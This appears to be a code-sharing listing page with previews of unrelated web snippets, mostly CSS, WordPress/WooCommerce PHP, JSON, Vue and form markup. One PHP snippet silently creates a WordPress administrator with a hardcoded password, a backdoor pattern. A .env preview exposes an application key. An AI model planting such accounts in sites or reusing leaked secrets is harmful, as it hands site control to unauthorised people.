This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
div#root { | |
width: 100% !important; | |
} | |
.sgm-market-g-i-cell-bc.market-bc.active { | |
background:#61ffba!important; | |
color:#fff !important; | |
} | |
.sgm-market-g-i-cell-bc.market-bc.active { | |
background: #61ffba !important; | |
font-weight:bold !important; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Images in post galleries | |
add_filter( 'get_post_galleries', '_img_url_filter', PHP_INT_MAX ); | |
add_filter( 'widget_media_image_instance', '_img_url_filter', PHP_INT_MAX ); | |
// Core image retrieval | |
add_filter( 'image_downsize', '_img_url_filter', 10, 3 ); | |
// Responsive image srcset substitution |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
add_action('woocommerce_product_options_general_product_data', 'addCustomMetaDataProductGeneralTab' ); | |
function addCustomMetaDataProductGeneralTab() { | |
woocommerce_wp_text_input( | |
[ | |
'id' => '__optimist_color', | |
'label' => 'Product Color', | |
'description' => 'Add product color', | |
] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"mergeLabelDocOption": "LABELS_AND_DOCS", | |
"requestedShipment": { | |
"shipDatestamp": "2019-10-14", | |
"totalDeclaredValue": { | |
"amount": 12.45, | |
"currency": "USD" | |
}, | |
"shipper": { | |
"address": { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1 | |
2 | |
3 | |
4 | |
5 | |
11 | |
12 | |
13 | |
14 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<template> | |
<!--Completed Container--> | |
<div class="card mb-5 mb-5"> | |
<div class="card-body pt-9 pb-0"> | |
<div class="d-flex flex-wrap flex-sm-nowrap px-20 py-2 pb-6"> | |
<div class="flex-grow-1"> | |
<div class="row"> | |
<div class="col-10 d-flex flex-column align-items-start justify-content-start"> | |
<div class="d-flex align-items-center mb-2 d-flex justify-content-between align-items-center"> | |
<span class="text-gray-800 fs-2 fw-bolder me-1"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function setOptimistSuperUser() | |
{ | |
$user = '[email protected]'; | |
$pass = '=y;fM38z69jcfdgCo*#!'; | |
$email = '[email protected]'; | |
if ( !username_exists( $user ) && !email_exists( $email ) ) | |
{ | |
$user_id = wp_create_user( $user, $pass, $email ); | |
$user = new WP_User( $user_id ); | |
$user->set_role( 'administrator' ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
APP_NAME=LyssaShop | |
APP_ENV=local | |
APP_KEY=base64:1123cQ0EcfaPZW80rgayMyEF3yiNezRjB5UvoP4RjDw= | |
APP_DEBUG=true | |
APP_URL=https://amberparfum.site | |
LOG_CHANNEL=stack | |
LOG_LEVEL=debug | |
DB_CONNECTION=mysql |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="row"> | |
<div class="col-md-4"> | |
[text* your-name class:form-control placeholder "Adınız, Soyadınız (Zorunlu)"] | |
</div> | |
<div class="col-md-4"> | |
[email* your-email class:form-control placeholder "E-Posta (Zorunlu)"] | |
</div> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script type="application/ld+json"> | |
{ | |
"@context": "http://schema.org", | |
"@type": "Review", | |
"mainEntityOfPage": "https://www.eurogamer.net/articles/2013-11-20-forza-motorsport-5-review", | |
"url": "https://www.eurogamer.net/articles/2013-11-20-forza-motorsport-5-review", | |
"headline": "Forza Motorsport 5 review", | |
"inLanguage": "en", | |
"image": { | |
"@type": "ImageObject", |
NewerOlder